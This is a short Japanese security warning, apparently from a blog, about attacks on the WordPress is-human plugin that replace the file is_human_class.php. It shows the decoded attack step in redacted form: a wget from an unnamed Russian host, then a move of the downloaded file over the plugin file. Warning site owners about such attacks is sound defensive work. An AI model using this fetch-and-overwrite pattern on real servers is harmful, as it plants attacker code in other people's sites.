WordPress の is-human プラグインを狙った攻撃がきています。
どのバージョンにセキュリティホールがあるか分かりませんが、
利用されている方は確認した方がよいかもしれません。
この攻撃で置き換えられるファイルは is_human_class.php です。
XXXXXXの部分はbase64でエンコードされたコードがありましたが、
悪用されるのを防ぐために編集して表示しています。
コードの内容
wget ロシアのサイト/YYY
mv YYY is_human_class.php